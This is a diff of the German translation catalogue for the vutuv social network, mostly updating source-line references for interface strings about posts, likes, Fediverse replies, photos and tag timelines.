+#: lib/vutuv_web/components/post_components.ex:4725
+#: lib/vutuv_web/components/post_components.ex:4739
 #: lib/vutuv_web/components/ui.ex:3226
 #: lib/vutuv_web/live/fediverse_account_live.ex:437
 #: lib/vutuv_web/live/organization_live/following.ex:385
@@ -6861,7 +6861,7 @@ msgstr "Neue Nachrichten und neue Vernetzungen"
 msgid "Remove this connection? You will stop following them."
 msgstr "Diese Vernetzung entfernen? Sie folgen der Person dann nicht mehr."
 
-#: lib/vutuv_web/components/post_components.ex:4722
+#: lib/vutuv_web/components/post_components.ex:4725
 #: lib/vutuv_web/components/ui.ex:3225
 #: lib/vutuv_web/live/fediverse_account_live.ex:435
 #: lib/vutuv_web/live/organization_live/following.ex:385
@@ -7066,7 +7066,7 @@ msgid "Filter"
 msgstr "Filtern"
 
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:591
-#: lib/vutuv_web/live/tag_live/timeline.ex:335
+#: lib/vutuv_web/live/tag_live/timeline.ex:336
 #, elixir-autogen, elixir-format
 msgid "Filters"
 msgstr "Filter"
@@ -7579,7 +7579,7 @@ msgid "applies to the whole list, not just this page"
 msgstr "betrifft die ganze Liste, nicht nur diese Seite"
 
 #: lib/vutuv_web/components/job_components.ex:190
-#: lib/vutuv_web/components/post_components.ex:7213
+#: lib/vutuv_web/components/post_components.ex:7189
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:980
 #: lib/vutuv_web/live/shell_live.ex:1830
 #, elixir-autogen, elixir-format
@@ -7692,9 +7692,9 @@ msgstr ""
 #: lib/vutuv_web/components/welcome_components.ex:362
 #: lib/vutuv_web/live/admin/media_live.ex:270
 #: lib/vutuv_web/live/admin/newsletter_broadcast_live.ex:174
-#: lib/vutuv_web/live/post_live/feed.ex:4234
+#: lib/vutuv_web/live/post_live/feed.ex:4232
 #: lib/vutuv_web/live/post_rewrites_live.ex:447
-#: lib/vutuv_web/live/press_kit_live.ex:1056
+#: lib/vutuv_web/live/press_kit_live.ex:1081
 #, elixir-autogen
 msgid "Done"
 msgstr "Fertig"
@@ -8192,7 +8192,7 @@ msgstr "Prüfung ausstehend"
 #: lib/vutuv_web/live/admin/media_live.ex:146
 #: lib/vutuv_web/live/admin/user_live.ex:184
 #: lib/vutuv_web/live/job_board_live.ex:319
-#: lib/vutuv_web/live/tag_live/timeline.ex:399
+#: lib/vutuv_web/live/tag_live/timeline.ex:400
 #, elixir-autogen, elixir-format
 msgid "Clear filters"
 msgstr "Filter zurücksetzen"
@@ -9151,7 +9151,7 @@ msgstr ""
 msgid "CV download"
 msgstr "Lebenslauf-Download"
 
-#: lib/vutuv_web/components/post_components.ex:6068
+#: lib/vutuv_web/components/post_components.ex:6071
 #, elixir-autogen, elixir-format
 msgid "Reposted by %{name} and %{formatted} other"
 msgid_plural "Reposted by %{name} and %{formatted} others"
@@ -12628,7 +12628,7 @@ msgid "Everyone (public)"
 msgstr "Alle (öffentlich)"
 
 #: lib/vutuv_web/live/job_posting_live/form.ex:681
-#: lib/vutuv_web/live/tag_live/timeline.ex:380
+#: lib/vutuv_web/live/tag_live/timeline.ex:381
 #: lib/vutuv_web/templates/education/form_content.html.heex:41
 #: lib/vutuv_web/templates/work_experience/form_content.html.heex:63
 #, elixir-autogen, elixir-format
@@ -13574,7 +13574,7 @@ msgid "Stop e-mail alerts for your saved search \"%{label}\"?"
 msgstr ""
 "E-Mail-Benachrichtigungen für Ihre gespeicherte Suche „%{label}“ stoppen?"
 
-#: lib/vutuv_web/components/post_components.ex:4077
+#: lib/vutuv_web/components/post_components.ex:4080
 #: lib/vutuv_web/components/saved_search_components.ex:43
 #: lib/vutuv_web/controllers/settings_controller.ex:788
 #: lib/vutuv_web/controllers/settings_controller.ex:806
@@ -13972,7 +13972,7 @@ msgstr "In den Text einfügen"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:259
 #: lib/vutuv_web/agent_docs/text.ex:221
-#: lib/vutuv_web/live/tag_live/timeline.ex:283
+#: lib/vutuv_web/live/tag_live/timeline.ex:284
 #, elixir-autogen, elixir-format
 msgid "Posts with this tag"
 msgstr "Beiträge mit diesem Tag"
@@ -14189,34 +14189,34 @@ msgstr "Wenn aus, erscheint diese Art von Benachrichtigung nie, von wem auch imm
 msgid "added %{count} new entries to their CV:"
 msgstr "hat %{count} neue Einträge im Lebenslauf:"
 
-#: lib/vutuv_web/components/post_components.ex:6756
+#: lib/vutuv_web/components/post_components.ex:6759
 #, elixir-autogen, elixir-format
 msgid "Audiobook"
 msgstr "Hörbuch"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1390
-#: lib/vutuv_web/components/post_components.ex:6713
+#: lib/vutuv_web/components/post_components.ex:6716
 #, elixir-autogen, elixir-format
 msgid "Book review"
 msgstr "Buchbesprechung"
 
-#: lib/vutuv_web/components/post_components.ex:6757
+#: lib/vutuv_web/components/post_components.ex:6760
 #, elixir-autogen, elixir-format
 msgid "Cinema"
 msgstr "Kino"
 
-#: lib/vutuv_web/components/post_components.ex:6759
+#: lib/vutuv_web/components/post_components.ex:6762
 #, elixir-autogen, elixir-format
 msgid "DVD/Blu-ray"
 msgstr "DVD/Blu-ray"
 
-#: lib/vutuv_web/components/post_components.ex:6755
+#: lib/vutuv_web/components/post_components.ex:6758
 #, elixir-autogen, elixir-format
 msgid "E-book"
 msgstr "E-Book"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1390
-#: lib/vutuv_web/components/post_components.ex:6712
+#: lib/vutuv_web/components/post_components.ex:6715
 #, elixir-autogen, elixir-format
 msgid "Film review"
 msgstr "Filmbesprechung"
@@ -14227,12 +14227,12 @@ msgstr "Filmbesprechung"
 msgid "Look up"
 msgstr "Nachschlagen"
 
-#: lib/vutuv_web/components/post_components.ex:6754
+#: lib/vutuv_web/components/post_components.ex:6757
 #, elixir-autogen, elixir-format
 msgid "Printed book"
 msgstr "Gedrucktes Buch"
 
-#: lib/vutuv_web/components/post_components.ex:6758
+#: lib/vutuv_web/components/post_components.ex:6761
 #, elixir-autogen, elixir-format
 msgid "Streaming"
 msgstr "Streaming"
@@ -14252,7 +14252,7 @@ msgstr "Streaming"
 msgid "Year"
 msgstr "Jahr"
 
-#: lib/vutuv_web/components/post_components.ex:6795
+#: lib/vutuv_web/components/post_components.ex:6798
 #: lib/vutuv_web/views/job_reference_html.ex:180
 #, elixir-autogen, elixir-format
 msgid "%{formatted} page"
@@ -14260,30 +14260,30 @@ msgid_plural "%{formatted} pages"
 msgstr[0] "%{formatted} Seite"
 msgstr[1] "%{formatted} Seiten"
 
-#: lib/vutuv_web/components/post_components.ex:6825
+#: lib/vutuv_web/components/post_components.ex:6828
 #: lib/vutuv_web/components/ui.ex:3884
 #, elixir-autogen, elixir-format
 msgid "%{hours} h"
 msgstr "%{hours} Std."
 
-#: lib/vutuv_web/components/post_components.ex:6826
+#: lib/vutuv_web/components/post_components.ex:6829
 #: lib/vutuv_web/components/ui.ex:3885
 #, elixir-autogen, elixir-format
 msgid "%{hours} h %{minutes} min"
 msgstr "%{hours} Std. %{minutes} Min."
 
-#: lib/vutuv_web/components/post_components.ex:6824
+#: lib/vutuv_web/components/post_components.ex:6827
 #: lib/vutuv_web/components/ui.ex:3877
 #, elixir-autogen, elixir-format
 msgid "%{minutes} min"
 msgstr "%{minutes} Min."
 
-#: lib/vutuv_web/components/post_components.ex:6784
+#: lib/vutuv_web/components/post_components.ex:6787
 #, elixir-autogen, elixir-format
 msgid "(print edition)"
 msgstr "(Druckausgabe)"
 
-#: lib/vutuv_web/components/post_components.ex:6831
+#: lib/vutuv_web/components/post_components.ex:6834
 #, elixir-autogen, elixir-format
 msgid "approx. %{duration}"
 msgstr "ca. %{duration}"
@@ -14313,7 +14313,7 @@ msgstr "Mit Qualifikation:"
 msgid "With qualification: %{name}"
 msgstr "Mit Qualifikation: %{name}"
 
-#: lib/vutuv_web/components/post_components.ex:6598
+#: lib/vutuv_web/components/post_components.ex:6601
 #, elixir-autogen, elixir-format
 msgid "Publisher:"
 msgstr "Verlag:"
@@ -14356,7 +14356,7 @@ msgstr "folgen Ihnen jetzt."
 msgid "endorsed you for %{tags}."
 msgstr "hat Sie für %{tags} empfohlen."
 
-#: lib/vutuv_web/components/post_components.ex:6589
+#: lib/vutuv_web/components/post_components.ex:6592
 #, elixir-autogen, elixir-format
 msgid "by:"
 msgstr "von:"
@@ -14719,14 +14719,14 @@ msgstr "Konto zum Einfrieren suchen"
 msgid "See all frozen accounts"
 msgstr "Alle eingefrorenen Konten anzeigen"
 
-#: lib/vutuv_web/components/post_components.ex:4366
+#: lib/vutuv_web/components/post_components.ex:4369
 #, elixir-autogen, elixir-format
 msgid "Show %{formatted} earlier post"
 msgid_plural "Show %{formatted} earlier posts"
 msgstr[0] "%{formatted} früheren Beitrag anzeigen"
 msgstr[1] "%{formatted} frühere Beiträge anzeigen"
 
-#: lib/vutuv_web/components/post_components.ex:4389
+#: lib/vutuv_web/components/post_components.ex:4392
 #, elixir-autogen, elixir-format
 msgid "Show %{formatted} more reply"
 msgid_plural "Show %{formatted} more replies"
@@ -14753,7 +14753,7 @@ msgstr "Dieses Profil ist zurzeit nicht verfügbar."
 msgid "Type a name, @handle or email to find an account to freeze."
 msgstr "Geben Sie einen Namen, ein @Handle oder eine E-Mail-Adresse ein, um das Konto zu finden, das eingefroren werden soll."
 
-#: lib/vutuv_web/components/post_components.ex:7312
+#: lib/vutuv_web/components/post_components.ex:7288
 #, elixir-autogen, elixir-format
 msgid "You can't like your own post."
 msgstr "Der eigene Beitrag lässt sich nicht mit „Gefällt mir“ markieren."
@@ -15469,7 +15469,7 @@ msgstr "Wir senden dorthin eine PIN, um zu bestätigen, dass die Adresse Ihnen g
 msgid "ZIP or postal code"
 msgstr "Postleitzahl"
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:387
+#: lib/vutuv_web/live/tag_live/timeline.ex:388
 #: lib/vutuv_web/templates/education/form_content.html.heex:59
 #: lib/vutuv_web/templates/work_experience/form_content.html.heex:81
 #, elixir-autogen, elixir-format
@@ -15914,7 +15914,7 @@ msgstr ""
 "wohin sie weiterwandert. Ein Bearbeiten oder Löschen auf vutuv ist für diese "
 "Server nur eine Bitte, und nicht jeder Server befolgt sie."
 
-#: lib/vutuv_web/components/post_components.ex:7258
+#: lib/vutuv_web/components/post_components.ex:7234
 #: lib/vutuv_web/live/notification_live/index.ex:1592
 #, elixir-autogen, elixir-format
 msgid "%{formatted} reply"
@@ -15922,7 +15922,7 @@ msgid_plural "%{formatted} replies"
 msgstr[0] "%{formatted} Antwort"
 msgstr[1] "%{formatted} Antworten"
 
-#: lib/vutuv_web/components/post_components.ex:7262
+#: lib/vutuv_web/components/post_components.ex:7238
 #: lib/vutuv_web/live/notification_live/index.ex:1586
 #, elixir-autogen, elixir-format
 msgid "%{formatted} like"
@@ -15930,7 +15930,7 @@ msgid_plural "%{formatted} likes"
 msgstr[0] "%{formatted} Like"
 msgstr[1] "%{formatted} Likes"
 
-#: lib/vutuv_web/components/post_components.ex:7266
+#: lib/vutuv_web/components/post_components.ex:7242
 #, elixir-autogen, elixir-format
 msgid "%{formatted} repost"
 msgid_plural "%{formatted} reposts"
@@ -15938,7 +15938,7 @@ msgstr[0] "%{formatted} Repost"
 msgstr[1] "%{formatted} Reposts"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1339
-#: lib/vutuv_web/components/post_components.ex:7217
+#: lib/vutuv_web/components/post_components.ex:7193
 #, elixir-autogen, elixir-format
 msgid "Already counted in the numbers above."
 msgstr "Bereits in den Zahlen oben enthalten."
@@ -16036,8 +16036,8 @@ msgstr "Diese Antwort können Sie nicht entfernen."
 #: lib/vutuv_web/agent_docs/markdown.ex:1539
 #: lib/vutuv_web/components/post_components.ex:1503
 #: lib/vutuv_web/components/post_components.ex:1734
-#: lib/vutuv_web/components/post_components.ex:3607
-#: lib/vutuv_web/components/post_components.ex:3935
+#: lib/vutuv_web/components/post_components.ex:3611
+#: lib/vutuv_web/components/post_components.ex:3938
 #: lib/vutuv_web/templates/remote_actor_card/card.html.heex:366
 #, elixir-autogen, elixir-format
 msgid "View the original"
@@ -16484,7 +16484,7 @@ msgstr "Hier ist noch nichts. Wenn Sie sich das nächste Mal anmelden oder eine 
 #: lib/vutuv_web/live/admin/activity_live.ex:237
 #: lib/vutuv_web/live/admin/media_live.ex:155
 #: lib/vutuv_web/live/fediverse_following_live.ex:351
-#: lib/vutuv_web/live/tag_live/timeline.ex:478
+#: lib/vutuv_web/live/tag_live/timeline.ex:479
 #, elixir-autogen, elixir-format
 msgid "Nothing matches that. Try a shorter search, or clear the filters."
 msgstr "Dazu passt nichts. Versuchen Sie eine kürzere Suche oder setzen Sie die Filter zurück."
@@ -16704,22 +16704,22 @@ msgstr "Was sich an welchem Konto geändert hat, wann, von welchem Gerät und wi
 msgid "device or detail"
 msgstr "Gerät oder Detail"
 
-#: lib/vutuv_web/components/post_components.ex:4551
+#: lib/vutuv_web/components/post_components.ex:4554
 #, elixir-autogen, elixir-format
 msgid "Pinned post"
 msgstr "Angehefteter Beitrag"
 
-#: lib/vutuv_web/components/post_components.ex:4685
+#: lib/vutuv_web/components/post_components.ex:4688
 #, elixir-autogen, elixir-format
 msgid "Pin to profile"
 msgstr "An Profil anheften"
 
-#: lib/vutuv_web/components/post_components.ex:4693
+#: lib/vutuv_web/components/post_components.ex:4696
 #, elixir-autogen, elixir-format
 msgid "Unpin from profile"
 msgstr "Vom Profil lösen"
 
-#: lib/vutuv_web/components/post_components.ex:4679
+#: lib/vutuv_web/components/post_components.ex:4682
 #, elixir-autogen, elixir-format
 msgid "Only one post can be pinned to your profile. Pin this one and release the other?"
 msgstr "Es lässt sich nur ein Beitrag an Ihr Profil anheften. Diesen anheften und den anderen lösen?"
@@ -16848,19 +16848,19 @@ msgstr "Nächstes Foto"
 msgid "No image description yet"
 msgstr "Noch keine Bildbeschreibung"
 
-#: lib/vutuv_web/components/post_components.ex:4130
+#: lib/vutuv_web/components/post_components.ex:4133
 #, elixir-autogen, elixir-format
 msgid "Open Fediverse settings"
 msgstr "Fediverse-Einstellungen öffnen"
 
-#: lib/vutuv_web/components/post_components.ex:5634
-#: lib/vutuv_web/components/press_kit_components.ex:526
+#: lib/vutuv_web/components/post_components.ex:5637
+#: lib/vutuv_web/components/press_kit_components.ex:562
 #, elixir-autogen, elixir-format
 msgid "Photo %{n} of %{total}"
 msgstr "Foto %{n} von %{total}"
 
-#: lib/vutuv_web/components/post_components.ex:5862
-#: lib/vutuv_web/components/press_kit_components.ex:623
+#: lib/vutuv_web/components/post_components.ex:5865
+#: lib/vutuv_web/components/press_kit_components.ex:660
 #, elixir-autogen, elixir-format
 msgid "Photo is being checked"
 msgstr "Foto wird geprüft"
@@ -16873,7 +16873,7 @@ msgstr "Foto-Einstellungen"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1500
 #: lib/vutuv_web/agent_docs/text.ex:909
-#: lib/vutuv_web/components/post_components.ex:5944
+#: lib/vutuv_web/components/post_components.ex:5947
 #, elixir-autogen, elixir-format
 msgid "Photos:"
 msgstr "Fotos:"
@@ -16899,7 +16899,7 @@ msgstr "Dieselben Bildpunkte, sonst nichts: Ort und Seriennummern entfernt, Qual
 msgid "Show camera settings"
 msgstr "Kameradaten anzeigen"
 
-#: lib/vutuv_web/components/post_components.ex:4183
+#: lib/vutuv_web/components/post_components.ex:4186
 #, elixir-autogen, elixir-format
 msgid "That server is blocked on this site, so no answer can be sent to it."
 msgstr "Dieser Server ist auf dieser Seite gesperrt, deshalb kann keine Antwort dorthin gesendet werden."
@@ -16919,7 +16919,7 @@ msgstr "Dieses Dateiformat lässt sich nur unverändert weitergeben. Entfernen S
 msgid "This photo carries the location it was taken at. Anyone who downloads the exact file can read it."
 msgstr "Dieses Foto enthält den Ort, an dem es aufgenommen wurde. Wer die exakte Datei herunterlädt, kann ihn auslesen."
 
-#: lib/vutuv_web/components/post_components.ex:4174
+#: lib/vutuv_web/components/post_components.ex:4177
 #, elixir-autogen, elixir-format
 msgid "This reply was sent to you alone, so it cannot be answered publicly."
 msgstr "Diese Antwort wurde nur an Sie geschickt und lässt sich deshalb nicht öffentlich beantworten."
@@ -16929,12 +16929,12 @@ msgstr "Diese Antwort wurde nur an Sie geschickt und lässt sich deshalb nicht �
 msgid "This reply was written on another network. Answering it means sending your words to that network, which vutuv only does for members who have switched Fediverse participation on."
 msgstr "Diese Antwort wurde in einem anderen Netzwerk geschrieben. Sie zu beantworten heißt, Ihre Worte in dieses Netzwerk zu senden, und das tut vutuv nur für Mitglieder, die die Fediverse-Teilnahme eingeschaltet haben."
 
-#: lib/vutuv_web/components/post_components.ex:4192
+#: lib/vutuv_web/components/post_components.ex:4195
 #, elixir-autogen, elixir-format
 msgid "This site does not take part in the Fediverse."
 msgstr "Diese Seite nimmt nicht am Fediverse teil."
 
-#: lib/vutuv_web/components/post_components.ex:4126
+#: lib/vutuv_web/components/post_components.ex:4129
 #, elixir-autogen, elixir-format
 msgid "Turn on Fediverse participation to answer"
 msgstr "Fediverse-Teilnahme einschalten, um zu antworten"
@@ -16949,7 +16949,7 @@ msgstr "Wer diese Fotos weiterverwenden darf"
 msgid "You have sent a lot of answers to other networks in the past hour. Please try again later."
 msgstr "Sie haben in der letzten Stunde viele Antworten in andere Netzwerke geschickt. Bitte versuchen Sie es später noch einmal."
 
-#: lib/vutuv_web/components/post_components.ex:4187
+#: lib/vutuv_web/components/post_components.ex:4190
 #, elixir-autogen, elixir-format
 msgid "You moved your Fediverse account to another server, so answers are no longer sent from here."
 msgstr "Sie haben Ihr Fediverse-Konto auf einen anderen Server umgezogen, deshalb werden von hier aus keine Antworten mehr gesendet."
@@ -16959,7 +16959,7 @@ msgstr "Sie haben Ihr Fediverse-Konto auf einen anderen Server umgezogen, deshal
 msgid "Your Fediverse settings do not allow sending an answer right now."
 msgstr "Ihre Fediverse-Einstellungen erlauben es derzeit nicht, eine Antwort zu senden."
 
-#: lib/vutuv_web/components/post_components.ex:4140
+#: lib/vutuv_web/components/post_components.ex:4143
 #, elixir-autogen, elixir-format
 msgid "Your answer goes to %{handle} on their own server and to your Fediverse followers. It is a public post on vutuv as well."
 msgstr "Ihre Antwort geht an %{handle} auf dem eigenen Server und an Ihre Fediverse-Follower. Auf vutuv ist sie ebenfalls ein öffentlicher Beitrag."
@@ -17034,13 +17034,13 @@ msgstr[0] "Dieses Foto trägt den Ort, an dem es aufgenommen wurde, und die exak
 msgstr[1] "Einige dieser Fotos tragen den Ort, an dem sie aufgenommen wurden, und die exakte Datei gibt ihn weiter."
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1357
-#: lib/vutuv_web/components/post_components.ex:7255
+#: lib/vutuv_web/components/post_components.ex:7231
 #, elixir-autogen, elixir-format
 msgid "%{handle} liked this"
 msgstr "%{handle} gefällt das"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1355
-#: lib/vutuv_web/components/post_components.ex:7252
+#: lib/vutuv_web/components/post_components.ex:7228
 #, elixir-autogen, elixir-format
 msgid "%{handle} shared this"
 msgstr "%{handle} hat das geteilt"
@@ -17050,7 +17050,7 @@ msgstr "%{handle} hat das geteilt"
 msgid "Fediverse reactions"
 msgstr "Fediverse-Reaktionen"
 
-#: lib/vutuv_web/components/post_components.ex:7139
+#: lib/vutuv_web/components/post_components.ex:7134
 #, elixir-autogen, elixir-format
 msgid "From other networks"
 msgstr "Aus anderen Netzwerken"
@@ -17411,7 +17411,7 @@ msgstr "Nur für die Follower dieses Kontos"
 msgid "Thank you. Our copy was deleted right away."
 msgstr "Danke. Unsere Kopie wurde sofort gelöscht."
 
-#: lib/vutuv_web/components/post_components.ex:3934
+#: lib/vutuv_web/components/post_components.ex:3937
 #, elixir-autogen, elixir-format
 msgid "Vote on the original"
 msgstr "Beim Original abstimmen"
@@ -17436,7 +17436,7 @@ msgstr "Von Mitgliedern entfernte Inhalte aus anderen Netzwerken"
 msgid "Hide"
 msgstr "Verbergen"
 
-#: lib/vutuv_web/components/post_components.ex:3875
+#: lib/vutuv_web/components/post_components.ex:3878
 #, elixir-autogen, elixir-format
 msgid "Marked as sensitive by its author"
 msgstr "Von der verfassenden Person als sensibel markiert"
@@ -17566,12 +17566,12 @@ msgstr "Wieder verdecken"
 msgid "Sensitive. Show the picture."
 msgstr "Heikles Motiv. Bild anzeigen."
 
-#: lib/vutuv_web/components/post_components.ex:4033
+#: lib/vutuv_web/components/post_components.ex:4036
 #, elixir-autogen, elixir-format
 msgid "That is a lot of likes in one hour. Please try again later."
 msgstr "Das sind viele Likes in einer Stunde. Bitte versuchen Sie es später noch einmal."
 
-#: lib/vutuv_web/components/post_components.ex:4039
+#: lib/vutuv_web/components/post_components.ex:4042
 #, elixir-autogen, elixir-format
 msgid "That post is not here any more."
 msgstr "Diesen Beitrag gibt es hier nicht mehr."
@@ -17581,7 +17581,7 @@ msgstr "Diesen Beitrag gibt es hier nicht mehr."
 msgid "Back to the feed"
 msgstr "Zurück zum Feed"
 
-#: lib/vutuv_web/components/post_components.ex:4178
+#: lib/vutuv_web/components/post_components.ex:4181
 #, elixir-autogen, elixir-format
 msgid "This post was published to that account's followers only, so it cannot be answered with a public post here."
 msgstr ""
@@ -18225,7 +18225,7 @@ msgstr ""
 msgid "View the conversation"
 msgstr "Unterhaltung ansehen"
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:286
+#: lib/vutuv_web/live/tag_live/timeline.ex:287
 #: lib/vutuv_web/templates/post/index.html.heex:18
 #, elixir-autogen, elixir-format
 msgid "%{formatted} post"
@@ -18233,32 +18233,32 @@ msgid_plural "%{formatted} posts"
 msgstr[0] "%{formatted} Beitrag"
 msgstr[1] "%{formatted} Beiträge"
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:455
+#: lib/vutuv_web/live/tag_live/timeline.ex:456
 #, elixir-autogen, elixir-format
 msgid "Most liked"
 msgstr "Meiste Likes"
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:486
+#: lib/vutuv_web/live/tag_live/timeline.ex:487
 #, elixir-autogen, elixir-format
 msgid "No posts carry this tag yet."
 msgstr "Zu diesem Tag gibt es noch keine Beiträge."
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:484
+#: lib/vutuv_web/live/tag_live/timeline.ex:485
 #, elixir-autogen, elixir-format
 msgid "No posts from other networks carry this tag yet."
 msgstr "Aus anderen Netzwerken gibt es zu diesem Tag noch keine Beiträge."
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:481
+#: lib/vutuv_web/live/tag_live/timeline.ex:482
 #, elixir-autogen, elixir-format
 msgid "No posts on vutuv carry this tag yet."
 msgstr "Auf vutuv gibt es zu diesem Tag noch keine Beiträge."
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:362
+#: lib/vutuv_web/live/tag_live/timeline.ex:363
 #, elixir-autogen, elixir-format
 msgid "word in a post"
 msgstr "Wort in einem Beitrag"
 
-#: lib/vutuv_web/components/post_components.ex:4036
+#: lib/vutuv_web/components/post_components.ex:4039
 #, elixir-autogen, elixir-format
 msgid "That reply is not here any more."
 msgstr "Diese Antwort gibt es hier nicht mehr."
@@ -18330,19 +18330,19 @@ msgstr "Auf der Seite eines Beitrags stehen direkt unter der Zahl die Mitglieder
 msgid "Liked by"
 msgstr "Gefällt diesen Mitgliedern"
 
-#: lib/vutuv_web/components/post_components.ex:6238
+#: lib/vutuv_web/components/post_components.ex:6241
 #, elixir-autogen, elixir-format
 msgid "Liked by %{name}"
 msgstr "Gefällt %{name}"
 
-#: lib/vutuv_web/components/post_components.ex:6240
+#: lib/vutuv_web/components/post_components.ex:6243
 #, elixir-autogen, elixir-format
 msgid "Liked by %{name} and %{formatted} other"
 msgid_plural "Liked by %{name} and %{formatted} others"
 msgstr[0] "Gefällt %{name} und %{formatted} weiteren"
 msgstr[1] "Gefällt %{name} und %{formatted} weiteren"
 
-#: lib/vutuv_web/components/post_components.ex:6251
+#: lib/vutuv_web/components/post_components.ex:6254
 #, elixir-autogen, elixir-format
 msgid "Only you see everyone here: some of these members are not named to other readers."
 msgstr "Nur Sie sehen hier alle: Einige dieser Mitglieder werden anderen Lesern nicht genannt."
@@ -18516,7 +18516,7 @@ msgstr "Ausstellungsdatum"
 msgid "Label"
 msgstr "Bezeichnung"
 
-#: lib/vutuv_web/live/post_live/feed.ex:3958
+#: lib/vutuv_web/live/post_live/feed.ex:3956
 #: lib/vutuv_web/live/reference_check_live.ex:169
 #, elixir-autogen, elixir-format
 msgid "Loading…"
@@ -19941,7 +19941,7 @@ msgstr "Suchen Sie so oft Sie möchten und nehmen Sie dazu, was gehört. Abkürz
 msgid "Start over"
 msgstr "Von vorn beginnen"
 
-#: lib/vutuv_web/components/post_components.ex:4066
+#: lib/vutuv_web/components/post_components.ex:4069
 #, elixir-autogen, elixir-format
 msgid "A like or a repost is sent back to the network this post came from, and your account does not take part in the Fediverse at the moment. You can switch it on in the {settings}."
 msgstr "Ein Herz oder ein Repost geht zurück in das Netzwerk, aus dem dieser Beitrag stammt. Ihr Konto nimmt derzeit nicht am Fediverse teil. Einschalten können Sie das in den {settings}."
@@ -20828,27 +20828,27 @@ msgstr "Sprache"
 msgid "The language this post is written in"
 msgstr "Die Sprache, in der dieser Beitrag geschrieben ist"
 
-#: lib/vutuv_web/components/post_components.ex:6132
+#: lib/vutuv_web/components/post_components.ex:6135
 #, elixir-autogen, elixir-format
 msgid "Show the original"
 msgstr "Original anzeigen"
 
-#: lib/vutuv_web/components/post_components.ex:6168
+#: lib/vutuv_web/components/post_components.ex:6171
 #, elixir-autogen, elixir-format
 msgid "Translate"
 msgstr "Übersetzen"
 
-#: lib/vutuv_web/components/post_components.ex:6177
+#: lib/vutuv_web/components/post_components.ex:6180
 #, elixir-autogen, elixir-format
 msgid "Translated"
 msgstr "Übersetzt"
 
-#: lib/vutuv_web/components/post_components.ex:6180
+#: lib/vutuv_web/components/post_components.ex:6183
 #, elixir-autogen, elixir-format
 msgid "Translated from %{language}"
 msgstr "Übersetzt aus %{language}"
 
-#: lib/vutuv_web/components/post_components.ex:6157
+#: lib/vutuv_web/components/post_components.ex:6160
 #, elixir-autogen, elixir-format
 msgid "Translating…"
 msgstr "Wird übersetzt …"
@@ -20858,7 +20858,7 @@ msgstr "Wird übersetzt …"
 msgid "Feed language settings reset to the site defaults."
 msgstr "Feed-Spracheinstellungen auf die Website-Vorgaben zurückgesetzt."
 
-#: lib/vutuv_web/components/post_components.ex:6147
+#: lib/vutuv_web/components/post_components.ex:6150
 #: lib/vutuv_web/components/ui.ex:5549
 #: lib/vutuv_web/live/feed_languages_live.ex:65
 #: lib/vutuv_web/live/feed_languages_live.ex:200
@@ -20987,20 +20987,20 @@ msgstr "Wir haben den Link in Ihrem Profil noch nicht gefunden. Bitte versuchen 
 msgid "Your username, or paste the address of your profile page."
 msgstr "Ihr Benutzername – oder fügen Sie die Adresse Ihrer Profilseite ein."
 
-#: lib/vutuv_web/components/post_components.ex:5910
+#: lib/vutuv_web/components/post_components.ex:5913
 #, elixir-autogen, elixir-format
 msgid "Our AI is still checking it. As soon as it is through, the photo appears by itself."
 msgid_plural "Our AI is still checking them, %{done} of %{total} done. As soon as the last one is through, the photos appear by themselves."
 msgstr[0] "Unsere KI prüft es gerade. Sobald die Prüfung durch ist, erscheint das Foto von selbst."
 msgstr[1] "Unsere KI prüft sie gerade, %{done} von %{total} sind durch. Sobald die letzte durch ist, erscheinen die Fotos von selbst."
 
-#: lib/vutuv_web/components/post_components.ex:5907
+#: lib/vutuv_web/components/post_components.ex:5910
 #, elixir-autogen, elixir-format
 msgid "Your post is published, the photo is not there yet."
 msgstr "Ihr Beitrag ist veröffentlicht, das Foto noch nicht."
 
 #: lib/vutuv_web/components/post_components.ex:2913
-#: lib/vutuv_web/components/post_components.ex:4976
+#: lib/vutuv_web/components/post_components.ex:4979
 #, elixir-autogen, elixir-format
 msgid "Our AI is looking at it. It appears here by itself once it is through."
 msgid_plural "Our AI is looking at them. They appear here by themselves once they are through."
@@ -21593,7 +21593,7 @@ msgstr "Sie haben Browser-Benachrichtigungen eingeschaltet. Dieser Browser wurde
 msgid "email mail unsubscribe newsletter bell alert quiet fewer browser desktop popup push benachrichtigung"
 msgstr "e-mail email mail abbestellen abmelden newsletter glocke benachrichtigung weniger ruhe browser desktop popup push hinweis mitteilung"
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:341
+#: lib/vutuv_web/live/tag_live/timeline.ex:342
 #, elixir-autogen, elixir-format
 msgid "%{formatted} active"
 msgstr "%{formatted} aktiv"
@@ -21639,7 +21639,7 @@ msgid "Follow #%{tag} from Mastodon or any other Fediverse app and its public po
 msgstr ""
 "Folgen Sie #%{tag} von Mastodon oder einer anderen Fediverse-App aus, dann landen die öffentlichen Beiträge in Ihrer Timeline. Ein vutuv-Konto brauchen Sie dafür nicht."
 
-#: lib/vutuv_web/live/post_live/feed.ex:4128
+#: lib/vutuv_web/live/post_live/feed.ex:4126
 #, elixir-autogen, elixir-format
 msgid "Greet other members"
 msgstr "Andere Mitglieder begrüßen"
@@ -22137,13 +22137,13 @@ msgid "Hide a word or a whole phrase …"
 msgstr "Wort oder ganzen Satz ausblenden …"
 
 #: lib/vutuv_web/live/post_live/feed.ex:854
-#: lib/vutuv_web/live/post_live/feed.ex:4291
+#: lib/vutuv_web/live/post_live/feed.ex:4289
 #, elixir-autogen, elixir-format
 msgid "Hide tags"
 msgstr "Tags ausblenden"
 
 #: lib/vutuv_web/live/post_live/feed.ex:853
-#: lib/vutuv_web/live/post_live/feed.ex:4280
+#: lib/vutuv_web/live/post_live/feed.ex:4278
 #, elixir-autogen, elixir-format
 msgid "Hide words"
 msgstr "Wörter ausblenden"
